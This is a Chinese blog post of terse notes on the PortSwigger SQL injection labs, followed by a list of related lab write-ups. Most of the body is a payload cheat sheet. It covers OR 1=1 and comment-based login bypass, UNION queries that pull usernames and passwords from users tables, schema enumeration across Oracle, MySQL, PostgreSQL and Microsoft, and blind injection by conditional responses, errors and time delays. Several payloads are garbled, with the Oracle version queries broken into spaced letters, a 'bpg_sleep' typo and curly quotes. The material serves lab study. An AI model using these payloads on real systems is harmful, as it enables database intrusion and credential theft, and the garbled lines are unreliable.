PortSwigger SQL injection

已于 2023-04-14 09:44:15 修改
阅读量483 收藏
点赞数
分类专栏: Bug Bounty PortSwigger 文章标签: sql 数据库 mysql
于 2023-04-14 09:38:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mengzh620/article/details/130145085
版权
本文详细列举了多种SQL注入攻击手法,包括检索隐藏数据、确定查询列数、获取用户信息、列出数据库内容等,针对Oracle、Microsoft、PostgreSQL和MySQL等不同数据库系统。同时,介绍了盲注攻击,如条件响应和时间延迟方法,以及利用错误处理进行信息检索。这些揭示了数据库安全的重要性和防止SQL注入的必要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.Retrieval of hidden data ---- Modify the category parameter, giving it the value  '+OR+1=1-- 能看到所有的目录

  1. administrator’-- 可以忽略后面的 administrator%27–

3.determining the number of columns returned by the query 'UNION+SELECT+NULL,NULL–
'UNION+SELECT+NULL,NULL+FROM+DUAL–(Oracle)

'+UNION+SELECT+username,+password+FROM+users–

4.retrieving multiple values in a single column username||‘~’||password+FROM+users-- ~是用户名和密码之间的区分,用户自己加上的

  1. 'UNION+SELECT+null,banner+FROM+V v e r s i o n − − ′ U N I O N + S E L E C T + b a n n e r , n u l l + F R O M + V version-- 'UNION+SELECT+banner,null+FROM+V versionUNION+SELECT+banner,null+FROM+Vversion–

Database version
Oracle: SELECT banner FROM v v e r s i o n S E L E C T v e r s i o n F R O M v version SELECT version FROM v versionSELECTversionFROMvinstance

           Microsoft:    SELECT @@version  

           PostgreSQL:    SELECT version()  

            MySQL:        SELECT @@version

  1. 之后忽略
    Oracle: –
    Microsoft: #

  2. listing the database contents on non-Oracle databases

'UNION+SELECT+table_name,null+FROM+information_schema.tables–
'UNION+SELECT+column_name,null+FROM+information_schema.columns+WHERE+table_name=‘users_hgapfx’–
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx-

8.listing the database contents on Oracle databases

'UNION+SELECT+table_name,NULL+FROM+ALL_TABLES–
'UNION+SELECT+COLUMN_NAME,NULL+FROM+ALL_TAB_columns+WHERE+table_name=‘USERS_QDVTGN’–
'UNION+SELECT+username_qbyhqw,password_wwalgt+FROM+users_hgapfx-

9.Lab: Blind SQL injection with conditional responses

'AND(SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>n)=‘a’–
'AND(SELECT ‘a’ FROM users WHERE username=‘administrator’ AND LENGTH(password)>n)='a
—how much letters or numbers in the password

'AND (SELECT substring(password,1,1) FROM users WHERE username=‘administrator’)='a

10.Blind SQL injection with time delays

Oracle dbms_pipe.receive_message((‘a’),10)
Microsoft WAITFOR DELAY ‘0:0:10’
PostgreSQL SELECT pg_sleep(10)
MySQL SELECT SLEEP(10)

'||pg_sleep(10)–

11.Blind SQL injection with conditional errors

‘||+(select+case+when+substr(password,1,1)=‘a’+then+TO_CHAR(1/0)+ELSE+’‘+END+from+users+where+username=‘administrator’)+||’

12.Lab: Blind SQL injection with time delays and information retrieval

‘||pg_sleep(10)||’–

'||(select case when (username=‘administrator’ and substring(password,1,1)=‘a’) then bpg_sleep(10) else bpg_sleep(5) end from users)–

portswigger靶场SQL注入实验(上)
m0_51313985的博客
09-09 3406
最近发现一个挺不错的靶场,burpsuite的官方网站在线训练平台 不多说先到第一个系列的实验去一探究竟 麻了,英文界面属实不太友好! 所以我决定用谷歌看题,火狐去操作(主要火狐用习惯了) 第一个系列的实验为SQL注入,先来简单了解一下吧。 什么是SQL注入? SQL 注入是一种 Web 安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除这些数据,从而导
portswigger靶场SQL注入实验(下)
m0_51313985的博客
10-03 2582
实验9 点击了home之后页面给了回显,猜测后面进行盲注的时候要利用此回显来判断,打开bp吧 注入点在trackingid这,简单判断一下 存在注入,下面判断一下是否存在表users,表里是否存在名为administrator的用户以及密码password有多少字符 为真,存在users表,接着查用户 后面判断password的长度 大于1为真,扩大点看看 大于30无回显,长度应该是小于30的,具体多少跑一下payload吧 选择number范围1-30 到20,在确定了密码的长度之
PortSwigger web实验室(BurpSuit官方靶场)之SQL注入
weixin_60677557的博客
07-05 2661
SQL注入(SQLi)是一种Web安全漏洞,允许攻击者干扰应用程序对其数据库进行的查询。它通常允许攻击者查看他们通常无法检索的数据。这可能包括属于其他用户的数据,或者应用程序本身能够访问的任何其他数据。在许多情况下,攻击者可以修改或删除此数据,从而导致应用程序的内容或行为发生持久更改。在某些情况下,攻击者可以升级SQL注入攻击以危及底层服务器或其他后端基础架构,或执行拒绝服务攻击。
Lab11_ Blind SQL injection with conditional responses
最新发布
weixin_53797419的博客
02-13 1403
本文为burpsuit官方实验室sql注入系列第十一关:利用条件响应进行 SQL 盲注
PortSwiggerSQL注入实验全记录
leo788的博客
05-12 1217
靶场是Burp自带的网站中提供的,本篇主要对sql注入部分进行练习和记录。
protSwigger下的SQL注入系列--Lab1(检索隐藏的数据)
weixin_44746974的博客
10-23 534
protSwigger下的SQL注入系列–Lab1(检索隐藏的数据) 在不同情况下会出现各种SQL注入漏洞,攻击和技术。一些常见的SQL注入示例包括: 检索隐藏的数据,您可以在其中修改SQL查询以返回其他结果。 颠覆应用程序逻辑,您可以在其中更改查询以干扰应用程序的逻辑。 UNION攻击,您可以在其中从不同的数据库表中检索数据。 检查数据库,您可以在其中提取有关数据库版本和结构的信息。 盲SQL注入,其中您控制的查询结果未在应用程序的响应中返回。 第一步:进入实验,判断是否存在注入点: 1、2 开始
PortSwiggerのWeb Security Academy靶场】SQL Injection系列 9th
javagty6778的博客
01-05 158
Lab: Blind SQL injection with conditional responsesUrl: portswigger.net/web-securit…在带着 cookies的后续访问网页时会找到出现的 标志 ==> 无法回显 ==> 采用盲注的方式 0x03 爆破表名 0x04 爆破字段名 无法解决的痛点:函数无法使用(与此同时concat函数可以正常使用);没有无法select出结果(与此同时 无法select出结果)==> 导致的结果:没有办法一次性爆破出所有的select的
PortSwiggerのWeb Security Academy靶场】SQL Injection系列 10th1
javagty6778的博客
01-05 348
Lab: Blind SQL injection with conditional errorsUrl: portswigger.net/web-securit…不论如何点击,带与不带cookie,页面(HTTP response)是没有任何变化的;那么我们尝试让他报点错双引号正常回显 ==> 验证了是注入点,并且可以通过报错信息进行帮助的condition判断后续: exp代码 gitee.com/eclipse-ten…END (づ。◕‿‿◕。)づ
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 6123
BurpSuit官方实验室靶场-SQL注入通关记录。
portswigger靶场之sql注入(一)
wzhwzh123321的博客
01-26 554
portswigger靶场之sql注入
portswiggerSQL注入实验室笔记
m0_69349614的博客
07-06 1392
该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因此您可以使用 UNION 攻击从其他表中检索数据。这种攻击的第一步是确定查询返回的列数。然后,您将在后续实验中使用此技术来构建完整的攻击。要解决该实验,请通过执行SQL 注入 UNION攻击来确定查询返回的列数,该攻击会返回包含空值的附加行。'+ORDER+BY+3--'+UNION+SELECT+NULL,NULL,NULL--该实验室在产品类别过滤器中包含一个 SQL 注入漏洞。查询的结果在应用程序的响应中返回,因
portswigger靶场学习笔记(一)sqli注入
weixin_52835927的博客
10-08 532
在本次靶场开始联系之前,已经学习了sqli-labs,pikachu,DVWA三个靶场,在学习portswigger的时候,我准备从较为熟悉的sqli注入部分开始。
数据库】数据分析专项练习题库-SQL试卷二
Erathia
08-09 4942
目录 单选题 数据来源:数据分析专项练习题库 单选题 共50题,共99.0分 1.在以下语句中,哪个是查询所有t1表中城市名为空的记录 A.select * from t1 where city_name not null; B.select * from t1 where city_name is not null; C.select * from t1 where city_name null;D.select * from t1 where city_name is null; 本题
Lab: Blind SQL injection with conditional responses PRACTITIONER 带条件响应的SQL盲注靶场复盘
Zeker62的博客
08-18 685
靶场完成目标: This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie. The results of the SQL query are not returned, and no error message
bp靶场---SQL注入第十一关(关于cookie的盲注)
m0_72471814的博客
01-12 810
先看描述,应用程序使用trackingcookie进行分析,说明这个trackingcookie可能可以利用,既不返回查询结果页不返回错误信息,但是查询正确会显示welcome back的信息,相当于一个只能回答是或不是的机器人,让我们来利用这个机器人来拿到账号密码进行登录即可过关,已知users表和username、password字段。here we go开始学习url还是有控制参数,但是此时对我们已经没有别的反应了参数随便输都没有报错信息所以我们使用bp进行抓包,从trackingID入手。
(一)SQL注入实例
weixin_43047908的博客
04-09 2281
SQL injection UNION attack, determining the number of columns returned by the query GET /filter?category=Gifts HTTP/1.1 Host: ac691f351f548a1780ec009d00da0072.web-security-academy.net Connection: close Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v=
portswigger SQL注入
02-04
### Portswigger SQL 注入教程及相关资源 Portswigger Web Security Academy 提供了详尽的 SQL 注入学习路径,帮助理解不同类型的攻击向量及其防御措施。平台上的课程设计旨在通过实践操作来掌握技能。 #### 学习路径概述 Web Security Academy 的 SQL 注入部分分为多个模块,涵盖了从基础到高级的主题[^1]: - **基础知识** - 解释什么是 SQL 注入以及它的工作原理。 - **实验室练习** - 用户可以在受控环境中尝试各种形式的注入技术,包括基于错误、布尔盲注等方法。 - **防护建议** - 教授如何利用参数化查询和其他最佳实践防止漏洞的发生。 #### 实际案例分析 为了加深理解,网站提供了真实的场景模拟,让学员能够识别并修复潜在的安全隐患。这些实例通常涉及常见的 web 应用程序功能,比如登录表单验证逻辑中的缺陷[^2]。 ```python # 不安全的做法 query = "SELECT * FROM users WHERE username='%s' AND password='%s'" % (username, password) # 安全做法:使用预编译语句/参数绑定 stmt = connection.prepareStatement("SELECT * FROM users WHERE username=? AND password=?") stmt.setString(1, username) stmt.setString(2, password) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值